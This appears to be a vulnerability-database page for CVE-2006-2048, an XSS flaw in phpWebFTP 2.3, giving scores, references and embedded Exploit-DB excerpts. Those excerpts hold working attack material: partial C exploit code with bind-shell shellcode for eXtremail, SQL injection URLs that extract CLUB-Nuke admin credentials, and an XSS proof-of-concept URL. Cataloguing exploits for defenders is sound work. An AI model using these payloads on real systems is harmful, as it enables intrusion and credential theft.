CVE-2006-2048
published 2006-04-26CVE-2006-2048: Multiple cross-site scripting (XSS) vulnerabilities in index.php in Edwin van Wijk phpWebFTP 2.3 allow remote attackers to inject arbitrary web script or HTML…
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
2.09%
79.3th percentile
Multiple cross-site scripting (XSS) vulnerabilities in index.php in Edwin van Wijk phpWebFTP 2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) port, (2) server, and (3) user parameters. NOTE: it is possible that the affected version is actually 3.2.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpwebftp | phpwebftp | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
exploitdb·2007-10-15
CVE-2007-5467 eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
eXtremail 2.1.1 - PLAIN Authentication Remote Stack Overflow
---
/* extremail-v6.c
*
* Copyright (c) 2006 by
*
* eXtremail
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BBUF_SIZE BUF_SIZE/3*4+1
#define NOP 0x41
#define AUTH_CMD "1 AUTHENTICATE PLAIN\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define PORT_SHELL 4444
static const char movshell_lnx[] =
"\x8b\x44\x24\x08" /* mov 0x08(%esp),%eax */
"\x40" /* inc %eax */
"\xff\xe0"; /* jmp *%eax */
static const char bndshell_lnx[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
"\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
"\x
Exploit-DB
CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection
exploitdb·2006-08-08
CVE-2006-4072 CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection
CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection
---
# CLUB-Nuke [XP] v2.0 LCID 2048 (Turkish Version) SQL Injection Vulnerability
# Risk : High
# Credit : ASIANEAGLE
# Contact: [email protected]
# Web : www.asianeagle.org
# Download Link : http://www.aspindir.com/Kategoriler/asp/portal-&-hazir-site/?P=7&K=&T=
#Exploit:
Note : User Logins Must Be Enabled By Admin To Exploit This Vulnerability
#Admin Nick: http://[SITE]/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_ADI,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201
#Admin Password :http::[SITE]/club-nuke path/haber_detay.asp?haber_id=-1%20union%20select%200,1,U_SIFRE,3,4,5,6%20from%20UYELER%20where%20U_ID%20like%201
after login as user;
#Admin Nick : http://[SITE]/club-nuke path/menu.asp?men
Exploit-DB
PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2006-04-25
CVE-2006-2048 PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities
PHPWebFTP 2.3 - Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/17688/info
phpWebFTP is prone to multiple cross-site scripting vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input using the HTTP 'POST' method when submitting a malicious URI.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.anysite.com/PhpWebFtp/index.php?server=1&port=var%20sub_variable=11233;alert(sub_variable);&goPassive=on&user=1&password=1&language=bulgarian server=alert(''as-208395078');&port=21&goPassive=
http://secunia.com/advisories/19827http://securityreason.com/securityalert/786http://www.osvdb.org/24975http://www.securityfocus.com/archive/1/431985/100/0/threadedhttp://www.securityfocus.com/bid/17688http://www.subjectzero.net/research/phpwebftpxss.htmhttp://www.vupen.com/english/advisories/2006/1530https://exchange.xforce.ibmcloud.com/vulnerabilities/26067http://secunia.com/advisories/19827http://securityreason.com/securityalert/786http://www.osvdb.org/24975http://www.securityfocus.com/archive/1/431985/100/0/threadedhttp://www.securityfocus.com/bid/17688http://www.subjectzero.net/research/phpwebftpxss.htmhttp://www.vupen.com/english/advisories/2006/1530https://exchange.xforce.ibmcloud.com/vulnerabilities/26067
2006-04-26
Published